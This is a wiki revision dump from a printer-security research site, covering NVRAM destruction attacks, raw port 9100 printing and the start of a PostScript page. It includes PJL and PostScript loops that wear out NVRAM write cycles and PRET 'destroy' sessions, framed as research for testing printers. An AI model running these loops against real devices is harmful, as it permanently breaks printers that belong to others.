indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. 
Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. 
In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 
10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 20bda1d74c8bf556554f6207177408084089ffc3 113 112 2017-01-14T17:42:28Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. 
---- b739584b5a097709d5267755cb21902d3e7a94f2 Port 9100 printing 0 29 620 368 2017-03-24T12:02:21Z Admin 1 wikitext text/x-wiki

[[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]]

Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers, as it is considered ‘the simplest, fastest, and generally the most reliable network protocol used for printers’ <ref>''[https://www.cups.org/doc/network.html#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'', is not actually a printing protocol by itself. Instead, all data sent is processed directly by the printing device, just like a parallel connection tunnelled over TCP.
In contrast to [[LPD]], [[IPP]] and [[SMB]], the interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client over the same connection, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to the results of PJL, PostScript or PCL commands, for example for [[information disclosure]] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]].

=== Who would put a printer on the Internet? ===

Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and back, but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices, including printers.</ref>. As of February 2017, the Shodan search engine [https://www.shodan.io/search?query=port:9100+pjl reveals] 48,213 printing devices '''Internet-accessible''' through port 9100.

[[File:Shodan.png|border|Printers reachable directly via the Internet]]

Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has a motivation to obtain the department manager's payroll print job from a shared device.
It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc.</ref> compatible mobile apps – or automatically connect to an access point provided by the attacker with a "default" SSID <ref>''[https://www.pwnieexpress.com/blog/rogue-device-spotlight-wireless-printers Rogue Device Spotlight: Wireless Printers]'', Robert Awk, Pwnie Express Blog</ref>. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside the targeted institution, depending on the signal strength.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]]
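As an added example that is not part of this wiki page or of PRET/PFT, the following Python code performs the kind of exchange described above: it frames PJL commands with the UEL sequence, sends them over a raw port 9100 connection and reads the reply that the device returns on the same socket, terminated by a form feed. The host name in <code>query_printer</code> is a placeholder, and <code>FakePrinter</code> with its canned replies is an offline stand-in constructed so the example runs without a device.

```python
"""Query a printer over raw port 9100 and read the answer on the same connection.

Added example, not part of the Hacking Printers wiki or of PRET/PFT. It shows the
bidirectional channel this page describes: the TCP connection that carries a job
to port 9100 also carries back the output of the PJL commands in it. Framing is
standard PJL (UEL prefix, CRLF line ends, each response ends with a form feed);
the host name and the canned replies of the offline stand-in are constructed.
"""
import socket

UEL = b"\x1b%-12345X"   # Universal Exit Language: switch the device to PJL
FF = b"\x0c"            # PJL terminates every response with a form feed


def pjl_command(cmd: str) -> bytes:
    """Frame one PJL command the way a host driver would send it."""
    return UEL + b"@PJL " + cmd.encode("ascii") + b"\r\n" + UEL


def read_response(recv) -> bytes:
    """Read until the form feed that ends a PJL response or until the peer closes."""
    buf = b""
    while FF not in buf:
        chunk = recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.split(FF, 1)[0]


def parse_info(resp: bytes) -> dict:
    """Turn an '@PJL INFO ...' reply into a dict: the echoed command, KEY=VALUE
    lines by key, and bare lines (e.g. the quoted model string) under 'values'."""
    lines = [l.strip() for l in resp.decode("ascii", "replace").splitlines() if l.strip()]
    result = {"command": lines[0] if lines else ""}
    for line in lines[1:]:
        if "=" in line:
            key, _, value = line.partition("=")
            result[key.strip()] = value.strip().strip('"')
        else:
            result.setdefault("values", []).append(line.strip('"'))
    return result


def query(conn, cmd: str) -> dict:
    """Send one PJL command over an open connection and parse what comes back.
    conn needs sendall() and recv(), i.e. a socket or the stand-in below."""
    conn.sendall(pjl_command(cmd))
    return parse_info(read_response(conn.recv))


def query_printer(host: str, port: int = 9100, timeout: float = 5.0) -> list:
    """Run INFO ID and INFO STATUS against a real device. Devices that do not
    speak PJL answer nothing, which is what the socket timeout is for."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return [query(sock, "INFO ID"), query(sock, "INFO STATUS")]


class FakePrinter:
    """Offline stand-in for a port 9100 endpoint. Replies are constructed in the
    shape HP devices use; the model string is illustrative."""
    REPLIES = {
        b"INFO ID": b'@PJL INFO ID\r\n"HP LaserJet 4250"\r\n' + FF,
        b"INFO STATUS": b'@PJL INFO STATUS\r\nCODE=10001\r\nDISPLAY="Ready"\r\nONLINE=TRUE\r\n' + FF,
    }

    def __init__(self):
        self._out = b""

    def sendall(self, data: bytes):
        body = data.replace(UEL, b"").strip()                      # remove framing
        self._out += self.REPLIES.get(body[5:], b"@PJL\r\n" + FF)  # text after '@PJL '

    def recv(self, n: int) -> bytes:
        chunk, self._out = self._out[:n], self._out[n:]
        return chunk


if __name__ == "__main__":
    dev = FakePrinter()   # for a real device: query_printer("printer.example.internal")
    print(query(dev, "INFO ID"))
    print(query(dev, "INFO STATUS"))
```

Nothing on port 9100 authenticates the client, so any host that can reach the port can run these queries; the same channel carries the PJL, PostScript and PCL commands PRET uses, and devices that do not implement PJL simply stay silent, which is why the connection carries a timeout.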
---- 23760b9d4161c025350589e18cdbc6a996da7bed 303 260 2017-01-31T08:05:44Z 84.153.135.37 0 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules.
It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. 
As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 66154de015870b8e6f0272e17c897fb809595551 260 259 2017-01-28T14:45:08Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. 
Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. 
While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 9f19f371f06c5fa8e20ddaf783a8426377303a51 259 253 2017-01-28T14:44:12Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|180px|Deployment of raw print jobs via port 9100/tcp]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. 
Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 0db31c220c287b06e5f44405cad24cb761226351 253 235 2017-01-28T14:27:31Z Admin 1 wikitext text/x-wiki [[File:Raw-deployment-channel.png|thumb|Deployment of print jobs via port 9100/tcp]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. 
It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. 
As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below: [[File:Shodan.png|border|Printers reachable directly via the Internet]] Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 8d03e224fe08518fce97d8c6ce4ee45022397ad4 235 223 2017-01-28T13:14:09Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. 
Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers. Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. 
While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 5e6f3bdfb89e050548c91f2f6b126cf0820d1265 223 222 2017-01-23T18:54:33Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. 
Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. === Who would put a printer on the Internet? === Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 internet-accessible devices as printers. Attacking intranet printers however may also be attractive to an insider. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own wireless access point – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- a3d8581232920b8ec4ef5487f434172520197885 222 219 2017-01-23T18:53:18Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. 
It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 internet-accessible devices as printers. Attacking intranet printers however may also be attractive to an insider. 
Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own wireless access point – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- cd912416471cec619cf51d4cc71a273c1a55cbcc 219 84 2017-01-23T18:37:07Z Admin 1 wikitext text/x-wiki [[File:Shodan.png|thumb|Printers reachable via Internet]] Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. 
In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 1734d0146ebcbe1de6ae77b1f10534cbb7197a66 84 2017-01-09T09:50:19Z Admin 1 Created page with "Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the ear..." wikitext text/x-wiki Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. 
Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]] ---- 412d63ed55fe46c46d7190893e768142fca0ff74 PostScript 0 6 332 297 2017-01-31T15:49:33Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term ‘page description’ may 